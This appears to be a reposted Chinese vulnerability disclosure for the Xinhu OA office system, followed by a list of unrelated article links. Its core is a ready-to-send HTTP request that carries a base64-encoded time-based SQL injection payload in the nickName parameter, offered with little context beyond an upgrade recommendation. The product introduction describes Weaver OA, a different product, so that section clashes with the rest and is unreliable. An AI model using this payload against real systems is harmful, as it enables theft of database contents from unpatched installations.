当前位置: 首页 > article >正文

漏洞披露-信呼-OA

article 2025/3/11 8:56:01

更多网安漏洞复现,可前往无问社区查看icon-default.png?t=O83Ahttp://wwlib.cn/index.php/artread/artid/16564.html

0x01 产品简介

泛微数字化运营管理平台OA为组织提供从“可信数字身份、电子化流程审批、个性化岗位信息门户、 知识文档管理、电子化签署到内外协同的业务管理”

0x02 漏洞概述

信呼OA办公系统存在SQL注入漏洞,攻击者可利用该漏洞获取数据库敏感信息。

建议升级到最新版本已修复

0x03 复现环境

payload:

GET /index.php?m=openmodhetong|openapi&d=task&a=data&ajaxbool=0&nickName=MScgYW5kIHNsZWVwKDUpIw== HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36

http://www.kler.cn/a/297655.html

相关文章:

  • MIST:用于组织病理学亚型预测的多实例选择性Transformer|文献速递--基于深度学习的医学影像病灶分割
  • MNIST数据集内容查看
  • 【前端】探索webpack3项目build速度优化, 优化个p
  • 【信创】推荐一款在龙芯CPU终端上使用的WiFi接收器 _ 统信 _ 麒麟
  • ThreadLocal 释放的方式有哪些
  • 打造专业级PPT:用Python-pptx精准编辑图表属性
  • D 咖智能饮品机器人:科技与美味共舞,奏响饮品新乐章
  • 【第25章】Spring Cloud之Sentinel控制台详解
  • 策略模式实现搜索功能
  • 5本学习Rust顶级书籍
  • 微信小程序路由跳转之间的区别
  • cesium地图高程数据DEM使用及转换
  • 数学建模笔记—— 灰色关联分析[GRA]
  • 了解Http和Https的区别
  • 以下是分析执行计划中索引使用情况的方法:
  • ASP.NET Core 入门教学二十二 SignalR集成
  • 【JavaScrip】为什么箭头函数不能做构造函数
  • C++第三节入门 - 引用详解
  • CSS的基本语法
  • [【人工智能学习笔记】4_3 深度学习基础之卷积神经网络